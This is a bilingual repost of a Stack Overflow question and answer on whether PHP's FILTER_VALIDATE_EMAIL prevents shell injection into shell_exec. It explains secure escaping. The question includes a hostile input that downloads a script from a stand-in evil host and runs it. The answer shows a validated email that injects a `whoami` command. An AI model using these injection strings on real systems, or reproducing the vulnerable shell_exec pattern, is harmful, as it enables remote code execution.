FILTER_VALIDATE_EMAIL是否足以停止外壳注入？ [英] Is FILTER_VALIDATE_EMAIL sufficient to stop shell injection?

问题描述

所以我打算使用 shell_exec（）处理运行发送电子邮件的php脚本。

So I'm planning on using shell_exec() to handle running a php script that sends an email.

一切都很好，但是我只是担心仅使用 FILTER_VALIDATE_EMAIL 来确保注入不会发生的安全隐患。

It's all working great, but I was just slightly concerned about the security implications of only using FILTER_VALIDATE_EMAIL to ensure injection can't occur.

因此，例如，我将使用与此类似的东西：

So, for example, I will be using something simlilar to this:

$email=$_POST['email'];
if(!filter_var($email, FILTER_VALIDATE_EMAIL)) {
    echo 'Nope ...';
} else {
    shell_exec("/usr/bin/php /var/www/mysite/includes/sendemail '" . $email . "'" > /dev/null 2>/dev/null &);
}

因此，显然，如果没有验证，我可以将电子邮件提交为：

So, obviously without the validation, I could submit my email as something like:

'; wget -O ./evil.sh http://evilsite.com/evilscript; ./evil.sh; '

所有地狱都可能崩溃……

and all hell could break loose ...

这是100％的注入证明（我们知道）还是我应该添加其他内容？

Is this 100% injection proof (That we know of) or is there something else I should add?

推荐答案

FILTER_VALIDATE_EMAIL实现基于 Michael Rushton的电子邮件地址验证 ，它使用 RFC 5321 验证输入。例如 邮箱生产规则。

The FILTER_VALIDATE_EMAIL implementation is based on Michael Rushton’s Email Address Validation, which validates the input using the RFC 5321, i. e., the Mailbox production rule.

这些电子邮件地址比实际使用的电子邮件地址更广泛。例如，RFC 5321允许在 Local-part 中用引号引起来的字符串，例如… @ example.com 。

Those email addresses are more extensive than those that are used in practice. For example, RFC 5321 allows quoted strings in the Local-part like "…"@example.com.

这允许注入任意命令，例如：

This allows to inject arbitrary commands, for example:

"'`whoami`'"@example.com

这最终会在您的shell命令中显示为：

This would end up in your shell command as:

/usr/bin/php /var/www/mysite/includes/sendemail '"'`whoami`'"@example.com' > /dev/null 2>/dev/null &

结果 sendmail 参数值应为引用了 whoami 的结果，例如 markus @ example.com 。

The resulting sendmail parameter value would be the result of whoami quoted, like "markus"@example.com.

您会发现FILTER_VALIDATE_EMAIL根本不适合验证shell参数，因为它本来就不是。

You see that FILTER_VALIDATE_EMAIL is simply not suited for validating shell arguments as it’s was not meant to be.

使用旨在转义shell参数的函数代替就像 escapeshellarg 一样，用于转义单个参数或 escapeshellcmd 来获取任意参数。

Use functions that are meant for escaping shell arguments instead like escapeshellarg for escaping single arguments or escapeshellcmd for arbitrary arguments.

通常，如果可以使用内置PHP功能实现相同功能，则应避免使用shell命令，因为即使 escapeshellarg 并非没有错误。

Generally, you should avoid shell commands if you can achieve the same with built-in PHP features because even escapeshellarg is not free of bugs.

这篇关于FILTER_VALIDATE_EMAIL是否足以停止外壳注入？的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！